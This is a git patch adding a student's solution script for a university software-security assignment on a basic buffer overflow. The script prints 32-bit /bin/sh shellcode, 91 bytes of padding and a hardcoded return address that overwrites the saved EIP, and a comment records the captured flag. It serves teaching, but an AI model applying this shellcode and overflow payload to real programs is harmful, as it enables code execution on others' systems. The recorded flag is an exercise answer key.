From b040e57d500f57b2e71193c8d8d14b5cd3a7a236 Mon Sep 17 00:00:00 2001 From: Sascha Tommasone Date: Fri, 14 Jun 2024 15:47:00 +0200 Subject: [PATCH] [Assignment-6] solution task 6 (basic buffer overflow attack) --- .../basic_overflow/solution.sh | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100755 Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh diff --git a/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh new file mode 100755 index 0000000..6c47ae7 --- /dev/null +++ b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +# flag{THAT_WAS_EASY_HUH} + +######### Exploit ######### +# Step 1: Write the provided shellcode to stdout +printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + +# Step 2: Fill the buffer with 'A's until the stored EIP is reached +printf "A%.0s" {1..91} + +# Step 3: Overwrite the stored EIP with the address of the shellcode +printf "\x2c\xd5\xff\xff" +###########################